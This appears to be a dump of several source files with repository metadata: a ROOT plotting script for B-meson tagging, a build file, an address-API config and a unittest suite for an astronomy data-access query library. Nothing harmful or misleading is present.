# script paramters plotsFilePath = 'plots/Reco14/20112012Reco14_tagging.pdf' dataSetFilePath = '/project/bfys/jleerdam/data/Bs2Jpsiphi/Reco14/P2VVDataSets20112012Reco14_I2Mass_6KKMassBins_2TagCats_HLT2B_20140619.root' fullDataSetName = 'JpsiKK' sigDataSetName = 'JpsiKK_sigSWeight' cbkgDataSetName = 'JpsiKK_cbkgSWeight' numEstWTagBins = 50 # workspace from P2VV.RooFitWrappers import RooObject ws = RooObject(workspace = 'JpsiphiWorkspace').ws() # read data sets from P2VV.Utilities.DataHandling import readData fullData = readData( filePath = dataSetFilePath, dataSetName = fullDataSetName, NTuple = False ) sigData = readData( filePath = dataSetFilePath, dataSetName = sigDataSetName, NTuple = False ) cbkgData = readData( filePath = dataSetFilePath, dataSetName = cbkgDataSetName, NTuple = False ) # get observables from P2VV.RooFitWrappers import RealVar, Category estWTagOS = RealVar('tagomega_os_cb') estWTagSS = RealVar('tagomega_ss_nn') tagCatOS = Category('tagCatP2VVOS') tagCatSS = Category('tagCatP2VVSS') # build PDFs for estimated wrong-tag probabilities taggedDataOS = sigData.reduce( '%s > 0' % tagCatOS.GetName() ) taggedDataSS = sigData.reduce( '%s > 0' % tagCatSS.GetName() ) from P2VV.RooFitWrappers import HistPdf tagPdfOS = HistPdf( Name = 'sig_bkg_estWTagOS' , Observables = [ estWTagOS ] , Binning = { estWTagOS : numEstWTagBins } , Data = taggedDataOS ) tagPdfSS = HistPdf( Name = 'sig_bkg_estWTagSS' , Observables = [ estWTagSS ] , Binning = { estWTagSS : numEstWTagBins } , Data = taggedDataSS ) # get normalization correction for tagged events untagFracOS = fullData.table(tagCatOS).getFrac('Untagged') untagFracSigOS = sigData.table(tagCatOS).getFrac('Untagged') untagFracBkgOS = cbkgData.table(tagCatOS).getFrac('Untagged') untagFracSS = fullData.table(tagCatSS).getFrac('Untagged') untagFracSigSS = sigData.table(tagCatSS).getFrac('Untagged') untagFracBkgSS = cbkgData.table(tagCatSS).getFrac('Untagged') # plot estimated wrong-tag probabilities for signal and for background from ROOT import gStyle gStyle.SetColorModelPS(1) from P2VV.Load import LHCbStyle from P2VV.Utilities.Plotting import plot from ROOT import TCanvas, kBlue, kFullDotLarge canvsOS = [ TCanvas( 'estWTagCanvOS%d' % it ) for it in range(3) ] for ( canv, data, nBins, norm ) in zip( canvsOS , [ fullData, sigData, cbkgData ] , 3 * [ numEstWTagBins ] , [ 1. - untagFracOS, 1. - untagFracSigOS, 1. - untagFracBkgOS ] ) : canv.SetLeftMargin(0.18) canv.SetRightMargin(0.05) canv.SetBottomMargin(0.18) canv.SetTopMargin(0.05) #plot( canv, estWTagOS, data, tagPdfOS plot( canv, estWTagOS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15 , xTitle = '#eta^{OS}' , yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) ) , frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagOS.GetName() ) , dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 ) #, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm ) ) canvsSS = [ TCanvas( 'estWTagCanvSS%d' % it ) for it in range(3) ] for ( canv, data, nBins, norm ) in zip( canvsSS , [ fullData, sigData, cbkgData ] , 3 * [ numEstWTagBins ] , [ 1. - untagFracSS, 1. - untagFracSigSS, 1. - untagFracBkgSS ] ) : canv.SetLeftMargin(0.18) canv.SetRightMargin(0.05) canv.SetBottomMargin(0.18) canv.SetTopMargin(0.05) #plot( canv, estWTagSS, data, tagPdfSS plot( canv, estWTagSS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15 , xTitle = '#eta^{SSK}' , yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) ) , frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagSS.GetName() ) , dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 ) #, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm ) ) for it, canv in enumerate( canvsOS + canvsSS ) : canv.Print( plotsFilePath + ( '(' if it == 0 else ')' if it == len( canvsOS + canvsSS ) - 1 else '' ) ) # #TODO: Make it availble in the case of cFit # if AllTagPlots: # self._estWTagCanvSS_B = TCanvas('estWTagCanvSS_B' , 'Est. wrong-tag probability SS, B' ) # self._estWTagCanvSS_Bbar = TCanvas( 'estWTagCanvSS_Bbar','Est. wrong-tag probability SS, Bbar') # self._estWTagCanvOS_B = TCanvas( 'estWTagCanvOS_B' ,'Est. wrong-tag probability OS, B' ) # self._estWTagCanvOS_Bbar = TCanvas( 'estWTagCanv0S_Bbar','Est. wrong-tag probability OS, Bbar') # # self._estWTagCanvSSOS_B = TCanvas( 'estWTagCanvSSOS_B' , 'Est. wrong-tag probability SS+OS, B' ) # self._estWTagCanvSSOS_Bbar = TCanvas( 'estWTagCanvSS0S_Bbar' , 'Est. wrong-tag probability SS+OS, Bbar' ) # self._estWTagCanvSSOS_BbarB = TCanvas( 'estWTagCanvSS0S_BbarB', 'Est. wrong-tag probability SS+OS, BbarB') # # tagCutSS_B = 'tagdecision_ss==tagdecision_ss::B' # tagCutSS_Bbar = 'tagdecision_ss==tagdecision_ss::Bbar' # tagCutOS_B = 'tagdecision_os==tagdecision_os::B' # tagCutOS_Bbar = 'tagdecision_os==tagdecision_os::Bbar' # # tagCutComb_B = 'tagdecision==tagdecision::B' # tagCutComb_Bbar = 'tagdecision==tagdecision::Bbar' # tagCutComb_BbarB = tagCutComb_B + '|' + tagCutComb_Bbar # # for ( pad, data, nBins, BorBbar, titleX, obs )\ # in zip( [ self._estWTagCanvSS_B , self._estWTagCanvSS_Bbar, # self._estWTagCanvOS_B , self._estWTagCanvOS_Bbar, # self._estWTagCanvSSOS_B, self._estWTagCanvSSOS_Bbar, # self._estWTagCanvSSOS_BbarB ] # # , [ sigData.reduce(tagCutSS_B ), # sigData.reduce(tagCutSS_Bbar ), # sigData.reduce(tagCutOS_B ), # sigData.reduce(tagCutOS_Bbar ), # sigData.reduce(tagCutComb_B ), # sigData.reduce(tagCutComb_Bbar ), # sigData.reduce(tagCutComb_BbarB) ] # # , 7 * [ numEstWTagBins ] # , 3 * [ 'B', 'Bbar' ] + [ 'BbarB' ] # , 2 * [ '#eta^{SS}' ] + 2 * [ '#eta^{OS}'] + 3 * [ '#eta^{SS+OS}'] # , 2 * [ estWTagSS ] + 2 * [ estWTagOS ] + 3 * [ estWTagComb ] # ) : # plot( pad, obs , data # , xTitle = titleX # , yScale = [0, None] # , frameOpts = dict( Bins = nBins, Title = obs.GetTitle() + BorBbar, Range = ( 0., 0.499999 ) # , Name = obs.GetName() + BorBbar ) # , dataOpts = dict( MarkerStyle = 8, MarkerSize = 0.4 ) # , pdfOpts = dict( LineColor = kBlue, LineWidth = 3 ) # )
58fd807cb9a2b63b9454583672f45c3ed6e352bd
1213bcf770a94a89b39be8dc7b99a3f7e35fd369
/src/alloy/tracing/channels/sources.gypi
cfba212621fc7e84a88c971af264625490afb49a
[]
no_license
wtfaremyinitials/xenia
c86e4625a1dd084d97d44c3242e2faf208bca2b8
16b3ecd5897051f82bc236ad9a4d0ab5cab22e87
refs/heads/master
2020-12-31T02:43:53.168712
2014-01-14T22:06:05
2014-01-14T22:06:05
15,918,955
2
0
null
null
null
null
UTF-8
Python
false
false
118
gypi
# Copyright 2013 Ben Vanik. All Rights Reserved. { 'sources': [ 'file_channel.cc', 'file_channel.h', ], }
988555a631d55ed2a9abdd2e1a296ccacb0d9a19
90f46ef9cd25460a05f10a4fb440c396debdb518
/address_old/app/config.py
b45dabe418e678e9aaad311863de1cb8db82d09b
[]
no_license
khanh-trieu/folder-erp-lap-tsg
addf543c1ed2b27beb0fe9508a4db835e258dc15
151335a5f9364d66a456f174e2b621a2d8a9727e
refs/heads/master
2023-04-19T13:49:28.134422
2021-05-20T02:46:32
2021-05-20T02:46:32
369,057,071
0
0
null
null
null
null
UTF-8
Python
false
false
269
py
API_GET_PROVINCE = 'https://api.mysupership.vn/v1/partner/areas/province' API_GET_DISTRICT = 'https://api.mysupership.vn/v1/partner/areas/district?province=' API_GET_WARD = 'https://api.mysupership.vn/v1/partner/areas/commune?district=' MSG_SUCCESS = 'Thành công!'
[ "Tsg@1234" ]
Tsg@1234
8b21e646fd26e249fa7cc2a641e4665b65831e68
0308ca5b152a082c1a206a1a136fd45e79b48143
/usvao/prototype/vaopy/tickets/VAOPD-892/tests/dal/testQueryNoNet.py
3feb0711d89be9813fcef7ab72cdca7914c90cad
[]
no_license
Schwarzam/usvirtualobservatory
b609bf21a09c187b70e311a4c857516284049c31
53fe6c14cc9312d048326acfa25377e3eac59858
refs/heads/master
2022-03-28T23:38:58.847018
2019-11-27T16:05:47
2019-11-27T16:05:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
27,204
py
#!/usr/bin/env python """ Tests for vaopy.dal.query """ import os, sys, shutil, re, imp, glob import unittest, pdb from urllib2 import URLError, HTTPError import vaopy.dal.query as dalq import vaopy.dal.dbapi2 as daldbapi # from astropy.io.vo import parse as votableparse from astropy.io.votable.tree import VOTableFile from vaopy.dal.query import _votableparse as votableparse testdir = os.path.dirname(sys.argv[0]) if not testdir: testdir = "tests" siaresultfile = "neat-sia.xml" ssaresultfile = "jhu-ssa.xml" testserverport = 8081 try: t = "aTestSIAServer" mod = imp.find_module(t, [testdir]) testserver = imp.load_module(t, mod[0], mod[1], mod[2]) testserver.testdir = testdir except ImportError, e: print >> sys.stderr, "Can't find test server: aTestSIAServer.py:", str(e) class DALAccessErrorTest(unittest.TestCase): msg = "nya-nya" url = "http://localhost" def testProperties2(self): e = dalq.DALAccessError(self.msg, self.url) self.assertEquals(self.msg, e.reason) self.assertEquals(self.url, e.url) e.reason = "poof" self.assertEquals("poof", e.reason) del e.reason self.assertEquals(dalq.DALAccessError._defreason, e.reason) def testProperties1(self): e = dalq.DALAccessError(self.msg) self.assertEquals(self.msg, e.reason) self.assert_(e.url is None) def testPropertiesDef(self): e = dalq.DALAccessError() self.assertEquals(dalq.DALAccessError._defreason, e.reason) self.assert_(e.url is None) class DALServiceErrorTest(unittest.TestCase): msg = "nya-nya" code = 404 url = "http://localhost/" def testProperties4(self): c = HTTPError("http://localhost/", self.code, self.msg, None, None) e = dalq.DALServiceError(self.msg, self.code, c, self.url) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is c) self.assertEquals(self.code, e.code) self.assertEquals(self.url, e.url) del e.cause self.assert_(e.cause is None) e.cause = c self.assert_(e.cause is c) e.code = 505 self.assertEquals(505, e.code) del e.code self.assert_(e.code is None) def testProperties3(self): c = HTTPError("http://localhost/", self.code, self.msg, None, None) e = dalq.DALServiceError(self.msg, self.code, c) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is c) self.assertEquals(self.code, e.code) self.assert_(e.url is None) def testProperties2(self): e = dalq.DALServiceError(self.msg, self.code) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is None) self.assertEquals(self.code, e.code) self.assert_(e.url is None) def testProperties1(self): e = dalq.DALServiceError(self.msg) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is None) self.assert_(e.code is None) self.assert_(e.url is None) def testPropertiesDef(self): e = dalq.DALServiceError() self.assert_(e.reason and e.reason.startswith("Unknown service ")) self.assert_(e.cause is None) self.assert_(e.code is None) self.assert_(e.url is None) def testFromExceptHTTP(self): url = "http://localhost/" c = HTTPError(url, self.code, self.msg, None, None) e = dalq.DALServiceError.from_except(c) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is c) self.assertEquals(self.code, e.code) self.assertEquals(url, e.url) def testFromExceptURL(self): url = "http://localhost/" c = URLError(self.msg) e = dalq.DALServiceError.from_except(c, url) self.assertEquals(self.msg, e.reason) self.assert_(e.cause is c) self.assert_(e.code is None) self.assertEquals(url, e.url) def testFromExcept(self): c = RuntimeError(self.msg) e = dalq.DALServiceError.from_except(c) self.assertEquals(e.reason, "RuntimeError: " + self.msg) self.assert_(e.cause is c) self.assert_(e.code is None) self.assert_(e.url is None) class DALQueryErrorTest(unittest.TestCase): msg = "nya-nya" label = "goofed" def testProperties2(self): e = dalq.DALQueryError(self.msg, self.label) self.assertEquals(self.msg, e.reason) self.assertEquals(self.label, e.label) e.reason = "poof" self.assertEquals("poof", e.reason) e.label = "OVERFLOW" self.assertEquals("OVERFLOW", e.label) del e.label self.assert_(e.label is None) def testProperties1(self): e = dalq.DALQueryError(self.msg) self.assertEquals(self.msg, e.reason) self.assert_(e.label is None) def testPropertiesDef(self): e = dalq.DALQueryError() self.assert_(e.reason and e.reason.startswith("Unknown DAL Query ")) self.assert_(e.label is None) class DALResultsTest(unittest.TestCase): def setUp(self): resultfile = os.path.join(testdir, siaresultfile) self.tbl = votableparse(resultfile) def testCtor(self): self.result = dalq.DALResults(self.tbl) self.assert_(isinstance(self.result._fldnames, list)) self.assert_(self.result.votable is not None) def testProps(self): self.testCtor() self.assertEquals(self.result.nrecs, 2) try: self.result.nrecs = 4 self.fail("size is not read-only") except AttributeError: pass names = self.result.fieldnames() self.assert_(isinstance(names, list)) self.assertEquals(len(names), 10) for i in xrange(len(names)): self.assert_(isinstance(names[i], str) or isinstance(names[i], unicode), "field name #%d not a string: %s" % (i,type(names[i]))) self.assert_(len(names[i]) > 0, "field name #%s is empty" % i) fd = self.result.fielddesc() self.assert_(isinstance(fd, list)) self.assertEquals(len(fd), 10) for fld in fd: self.assert_(hasattr(fld,'name')) self.assert_(hasattr(fld,'ID')) self.assert_(hasattr(fld,'ucd')) self.assert_(hasattr(fld,'datatype')) for i in xrange(len(names)): fld = self.result.getdesc(names[i]) self.assert_(fld is fd[i]) fld = self.result.getdesc("Format") self.assertEquals(fld.name, "Format") # self.assertEquals(fld.ID, "Format") self.assertEquals(fld.ucd, "VOX:Image_Format") self.assertEquals(fld.datatype, "char") self.assertEquals(fld.arraysize, "*") self.assert_(fld.utype is None) def testValue(self): self.testCtor() self.assertEquals(self.result.getvalue("Format", 0), "image/fits") self.assertEquals(self.result.getvalue("Format", 1), "image/jpeg") self.assertEquals(self.result.getvalue("Dim", 0), 2) val = self.result.getvalue("Size", 0) self.assertEquals(len(val), 2) self.assertEquals(val[0], 300) self.assertEquals(val[1], 300) self.assertRaises(ValueError, self.result.getvalue, "Goober", 0) def testGetRecord(self): self.testCtor() rec = self.result.getrecord(0) self.assert_(rec is not None) self.assert_(isinstance(rec, dalq.Record)) rec = self.result.getrecord(1) self.assert_(rec is not None) self.assert_(isinstance(rec, dalq.Record)) self.assertRaises(IndexError, self.result.getrecord, 2) def testGetColumn(self): self.testCtor() col = self.result.getcolumn('Ra') shifted = col + 0.05 self.assertAlmostEquals(0.05, shifted[0]-col[0]) self.assertRaises(ValueError, self.result.getcolumn, 'goob') def testIter(self): self.testCtor() i = 0 for rec in self.result: self.assert_(rec is not None) self.assert_(isinstance(rec, dalq.Record)) i += 1 self.assertEquals(i, 2) def testCursor(self): self.testCtor() c = self.result.cursor() self.assert_(c is not None) self.assert_(isinstance(c, daldbapi.Cursor)) def testByUcd(self): self.testCtor() self.assertEquals(self.result.fieldname_with_ucd("POS_EQ_RA_MAIN"),"Ra") self.assertEquals(self.result.fieldname_with_ucd("VOX:Image_AccessReference"),"URL") class RecordTest(unittest.TestCase): def setUp(self): resultfile = os.path.join(testdir, siaresultfile) self.tbl = votableparse(resultfile) self.result = dalq.DALResults(self.tbl) self.rec = self.result.getrecord(0) def testFields(self): fnames = self.result.fieldnames() reckeys = self.rec.keys() for name in fnames: self.assert_(name in reckeys, "Missing fieldname: "+name) def testValues(self): self.assertEquals(self.rec["Format"], "image/fits") self.assertEquals(self.rec["Dim"], 2) val = self.rec["Size"] self.assertEquals(len(val), 2) self.assertEquals(val[0], 300) self.assertEquals(val[1], 300) try: self.rec["Goober"] self.fail("Failed to raise KeyError on bad key") except KeyError: pass def testSuggestExtension(self): self.assertEquals(self.rec.suggest_extension("goob"), "goob") self.assert_(self.rec.suggest_extension() is None) class EnsureBaseURLTest(unittest.TestCase): def testFix(self): self.assertEquals(dalq.ensure_baseurl("http://localhost")[-1], '?') self.assertEquals(dalq.ensure_baseurl("http://localhost/sia")[-1], '?') self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat")[-1], '&') self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes")[-1], '&') self.assertEquals(dalq.ensure_baseurl("http://localhost?"), "http://localhost?") self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?"), "http://localhost/sia?") self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&"), "http://localhost/sia?cat=neat&") self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes&"), "http://localhost/sia?cat=neat&usecache=yes&") class DALServiceTest(unittest.TestCase): def setUp(self): self.baseurl = "http://localhost/sia" def testCtor(self): self.res = {"title": "Archive", "shortName": "arch"} self.srv = dalq.DALService(self.baseurl, "sga", "2.0", self.res) def testProps(self): self.testCtor() self.assertEquals(self.srv.baseurl, self.baseurl) self.assertEquals(self.srv.protocol, "sga") self.assertEquals(self.srv.version, "2.0") try: self.srv.baseurl = "goober" self.fail("baseurl not read-only") except AttributeError: pass try: self.srv.protocol = "sia" self.fail("protocol not read-only") except AttributeError: pass try: self.srv.version = "1.0" self.fail("version not read-only") except AttributeError: pass self.assertEquals(self.srv.description["title"], "Archive") self.assertEquals(self.srv.description["shortName"], "arch") self.srv.description["title"] = "Sir" self.assertEquals(self.res["title"], "Archive") def testNoResmeta(self): srv = dalq.DALService(self.baseurl) self.assertEquals(srv.baseurl, self.baseurl) self.assert_(srv.description is not None) self.assert_(hasattr(srv.description, "get")) self.assertEquals(len(srv.description.keys()), 0) def testCreateQuery(self): self.testCtor() q = self.srv.create_query() self.assert_(isinstance(q, dalq.DALQuery)) self.assertEquals(q.baseurl, self.baseurl) self.assertEquals(q.protocol, self.srv.protocol) self.assertEquals(q.version, self.srv.version) def testCreateQueryWithKws(self): self.testCtor() q = self.srv.create_query(RA=12.045, DEC=-13.08, SR=0.01) self.assert_(isinstance(q, dalq.DALQuery)) self.assertEquals(q.baseurl, self.baseurl) self.assertEquals(q.protocol, self.srv.protocol) self.assertEquals(q.version, self.srv.version) self.assertAlmostEquals(q.getparam('RA'), 12.045) self.assertAlmostEquals(q.getparam('DEC'), -13.08) self.assertAlmostEquals(q.getparam('SR'), 0.01) class DALQueryTest(unittest.TestCase): def setUp(self): self.baseurl = "http://localhost/sia" def testCtor(self): self.query = dalq.DALQuery(self.baseurl, "sga", "2.0") self.assert_(self.query.getparam("format") is None) def testProps(self): self.testCtor() self.assertEquals(self.query.baseurl, self.baseurl) self.assertEquals(self.query.protocol, "sga") self.assertEquals(self.query.version, "2.0") self.query.baseurl = "http://gomer.net/infinite/loop?" self.assertEquals(self.query.baseurl, "http://gomer.net/infinite/loop?"); def testParam(self): self.testCtor() self.assertEquals(len(self.query.paramnames()), 0, "param set should be empty: " + str(self.query.paramnames())) self.assert_(self.query.getparam("RA") is None) self.query.setparam("RA", 51.235) self.assertEquals(len(self.query.paramnames()), 1) self.assertEquals(self.query.getparam("RA"), 51.235) self.query.setparam("RA", 127.235) self.assertEquals(len(self.query.paramnames()), 1) self.assertEquals(self.query.getparam("RA"), 127.235) self.query.setparam("DEC", -13.49677) self.assertEquals(len(self.query.paramnames()), 2) self.assertEquals(self.query.getparam("DEC"), -13.49677) self.query.unsetparam("FORMAT") self.assertEquals(len(self.query.paramnames()), 2) self.query.unsetparam("RA") self.assertEquals(len(self.query.paramnames()), 1) self.assertEquals(self.query.getparam("DEC"), -13.49677) self.assert_(self.query.getparam("RA") is None) def testQueryURL(self): self.testCtor() self.query.setparam("RA", 51.235) qurl = self.query.getqueryurl() self.assertEquals(qurl, self.baseurl+'?RA=51.235') self.query.setparam("DEC", -13.49677) qurl = self.query.getqueryurl() self.assert_(qurl == self.baseurl+'?RA=51.235&DEC=-13.49677' or qurl == self.baseurl+'?DEC=-13.49677&RA=51.235') self.query.setparam("SR", "1.0") qurl = self.query.getqueryurl() self.assert_(qurl == self.baseurl+'?RA=51.235&SR=1.0&DEC=-13.49677' or qurl == self.baseurl+'?DEC=-13.49677&SR=1.0&RA=51.235' or qurl == self.baseurl+'?RA=51.235&DEC=-13.49677&SR=1.0' or qurl == self.baseurl+'?DEC=-13.49677&RA=51.235&SR=1.0' or qurl == self.baseurl+'?SR=1.0&DEC=-13.49677&RA=51.235' or qurl == self.baseurl+'?SR=1.0&RA=51.235&DEC=-13.49677') def testEncode(self): self.testCtor() self.query.setparam("NaMe", "a val") qurl = self.query.getqueryurl() self.assertEquals(qurl, self.baseurl+'?NaMe=a+val') self.testCtor() self.query.setparam("NaMe", "a+val") qurl = self.query.getqueryurl() self.assertEquals(qurl, self.baseurl+'?NaMe=a%2Bval') def testEncodeList(self): self.testCtor() self.query.setparam("POS", (5.231, -13.441)) qurl = self.query.getqueryurl() self.assertEquals(qurl, self.baseurl+'?POS=5.231,-13.441') class QueryExecuteTest(unittest.TestCase): def setUp(self): pass # self.srvr = testserver.TestServer(testserverport) # self.srvr.start() def tearDown(self): pass #if self.srvr.isAlive(): # self.srvr.shutdown() #if self.srvr.isAlive(): # print "prob" def testExecute(self): q = dalq.DALQuery("http://localhost:%d/sia" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() results = q.execute() self.assert_(isinstance(results, dalq.DALResults)) self.assertEquals(results.nrecs, 2) def testExecuteStream(self): q = dalq.DALQuery("http://localhost:%d/sia" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() strm = q.execute_stream() self.assert_(strm is not None) self.assert_(hasattr(strm, "read")) results = strm.read() strm.close() self.assert_(results.startswith("<?xml version=")) def testExecuteRaw(self): q = dalq.DALQuery("http://localhost:%d/sia" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() data = q.execute_raw() self.assert_(data is not None) self.assert_(isinstance(data, unicode) or isinstance(data, str)) self.assert_(data.startswith("<?xml version=")) def testExecuteVotable(self): q = dalq.DALQuery("http://localhost:%d/sia" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() results = q.execute_votable() self.assert_(isinstance(results, VOTableFile)) def testExecuteServiceErr(self): q = dalq.DALQuery("http://localhost:%d/goob" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() self.assertRaises(dalq.DALServiceError, q.execute) def testExecuteRawServiceErr(self): q = dalq.DALQuery("http://localhost:%d/goob" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() self.assertRaises(dalq.DALServiceError, q.execute_raw) def testExecuteStreamServiceErr(self): q = dalq.DALQuery("http://localhost:%d/goob" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() try: q.execute_raw() self.fail("failed to raise exception on bad url") except dalq.DALServiceError, e: self.assertEquals(e.code, 404) self.assertEquals(e.reason, "Not Found") self.assert_(isinstance(e.cause, HTTPError)) except Exception, e: self.fail("wrong exception raised: " + str(type(e))) def testExecuteVotableServiceErr(self): q = dalq.DALQuery("http://localhost:%d/goob" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() self.assertRaises(dalq.DALServiceError, q.execute_votable) def testExecuteRawQueryErr(self): q = dalq.DALQuery("http://localhost:%d/err" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() data = q.execute_raw() self.assert_(data is not None) self.assert_(isinstance(data, unicode) or isinstance(data, str)) self.assert_(data.startswith("<?xml version=")) self.assert_('<INFO name="QUERY_STATUS" value="ERR' in data) def testExecuteQueryErr(self): q = dalq.DALQuery("http://localhost:%d/err" % testserverport) q.setparam("foo", "bar") # pdb.set_trace() try: q.execute() self.fail("failed to raise exception for syntax error") except dalq.DALQueryError, e: self.assertEquals(e.label, "ERROR") self.assertEquals(str(e), "Forced Fail") except dalq.DALServiceError, e: self.fail("wrong exception raised: DALServiceError: " + str(e)) except Exception, e: self.fail("wrong exception raised: " + str(type(e))) class CursorTest(unittest.TestCase): def setUp(self): resultfile = os.path.join(testdir, ssaresultfile) self.tbl = votableparse(resultfile) def testCtor(self): self.result = dalq.DALResults(self.tbl) self.assert_(isinstance(self.result._fldnames, list)) self.assert_(self.result.votable is not None) self.cursor = self.result.cursor() def testCursor(self): self.testCtor() self.assert_(self.cursor is not None) self.assert_(isinstance(self.cursor, daldbapi.Cursor)) self.assertEquals(self.cursor.rowcount, 35) self.assertEquals(self.cursor.arraysize, 1) descr = self.cursor.description self.assert_(len(descr) > 0) self.assertEquals(descr[1][0], 'AcRef') self.assert_(isinstance(descr[1][1], daldbapi.TypeObject)) def testInfos(self): self.testCtor() infos = self.cursor.infos() self.assertEquals(int(infos['TableRows']), 35) def testFetchOne(self): self.testCtor() pos = self.cursor.pos rec = self.cursor.fetchone() self.assertEquals(self.cursor.pos, pos + 1) rec2 = self.cursor.fetchone() # self.assert_(rec != rec2) self.assertEquals(self.cursor.pos, pos + 2) def testFetchMany(self): self.testCtor() pos = self.cursor.pos recs = self.cursor.fetchmany() self.assertEquals(len(recs), self.cursor.arraysize) recs = self.cursor.fetchmany(size = 5) self.assertEquals(len(recs), 5) recs = self.cursor.fetchmany(size = -5) def testFetchAll(self): self.testCtor() recs = self.cursor.fetchall() self.assertEquals(len(recs), 35) self.testCtor() self.cursor.fetchone() recs = self.cursor.fetchall() self.assertEquals(len(recs), 34) def testScroll(self): self.testCtor() pos = self.cursor.pos self.cursor.scroll(5) self.assertEquals(self.cursor.pos, pos + 5) self.cursor.scroll(5, mode = "absolute") self.assertEquals(self.cursor.pos, 5) try: self.cursor.scroll(-1, mode = "absolute") except daldbapi.DataError: pass self.cursor.scroll(-1) self.assertEquals(self.cursor.pos, 4) class DatasetNameTest(unittest.TestCase): base = "testds" def setUp(self): resultfile = os.path.join(testdir, siaresultfile) self.tbl = votableparse(resultfile) self.result = dalq.DALResults(self.tbl) self.rec = self.result.getrecord(0) self.cleanfiles() def tearDown(self): self.cleanfiles() def cleanfiles(self): files = glob.glob(os.path.join(testdir, self.base+"*.*")) for f in files: os.remove(f) def testMime2Ext(self): self.assertEquals("fits", dalq.mime2extension("application/fits")) self.assertEquals("fits", dalq.mime2extension("image/fits")) self.assertEquals("fits", dalq.mime2extension("image/x-fits")) self.assertEquals("jpg", dalq.mime2extension("image/jpeg")) self.assertEquals("gif", dalq.mime2extension("image/gif")) self.assertEquals("png", dalq.mime2extension("image/png")) self.assertEquals("txt", dalq.mime2extension("text/plain")) self.assertEquals("html", dalq.mime2extension("text/html")) self.assertEquals("xml", dalq.mime2extension("text/xml")) self.assertEquals("xml", dalq.mime2extension("application/votable;convention=stsci")) self.assertEquals("xml", dalq.mime2extension("application/x-votable")) self.assertEquals("xml", dalq.mime2extension("application/votable")) self.assertEquals("xls", dalq.mime2extension("application/x-micrsoft-spreadsheet", "xls")) def testSuggest(self): self.assertEquals("dataset", self.rec.suggest_dataset_basename()) self.assertEquals("DAT", self.rec.suggest_extension("DAT")) def testMakeDatasetName(self): self.assertEquals("./dataset.dat", self.rec.make_dataset_filename()) self.assertEquals("./goober.dat", self.rec.make_dataset_filename(base="goober")) self.assertEquals("./dataset.fits", self.rec.make_dataset_filename(ext="fits")) self.assertEquals("./goober.fits", self.rec.make_dataset_filename(base="goober", ext="fits")) self.assertEquals(testdir+"/dataset.dat", self.rec.make_dataset_filename(testdir)) path = os.path.join(testdir,self.base+".dat") self.assertFalse(os.path.exists(path)) self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) open(path,'w').close() self.assertTrue(os.path.exists(path)) path = os.path.join(testdir,self.base+"-1.dat") self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) open(path,'w').close() self.assertTrue(os.path.exists(path)) path = os.path.join(testdir,self.base+"-2.dat") self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) open(path,'w').close() self.assertTrue(os.path.exists(path)) path = os.path.join(testdir,self.base+"-3.dat") self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) self.cleanfiles() open(os.path.join(testdir,self.base+".dat"),'w').close() path = os.path.join(testdir,self.base+"-1.dat") self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) open(os.path.join(testdir,self.base+"-1.dat"),'w').close() open(os.path.join(testdir,self.base+"-2.dat"),'w').close() open(os.path.join(testdir,self.base+"-3.dat"),'w').close() path = os.path.join(testdir,self.base+"-4.dat") self.assertEquals(path, self.rec.make_dataset_filename(testdir, self.base)) self.cleanfiles() self.assertEquals(os.path.join(testdir,self.base+".dat"), self.rec.make_dataset_filename(testdir, self.base)) __all__ = "DALAccessErrorTest DALServiceErrorTest DALQueryErrorTest RecordTest EnsureBaseURLTest DALServiceTest DALQueryTest QueryExecuteTest CursorTest DatasetNameTest".split() def suite(): tests = [] for t in __all__: tests.append(unittest.makeSuite(globals()[t])) return unittest.TestSuite(tests) if __name__ == "__main__": srvr = testserver.TestServer(testserverport) try: srvr.start() unittest.main() finally: if srvr.isAlive(): srvr.shutdown()
[ "usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5" ]
usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5
b6d8f27ccd78ce668ead8011086bf2b955637496
67932bfe656c093cc306d4c9bca682140d21a470
/loopsByRecursion.py
06f6799b5a153b5acb0049b7e7e2968688365091
[]
no_license
dases/recursion_examples
bb8769c0f64ef8e612660547c00693ede725f72f
3733045157d0daf5016e0213eeace8f968203311
refs/heads/master
2023-07-16T05:46:51.521638
2021-09-01T21:27:34
2021-09-01T21:27:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
252
py
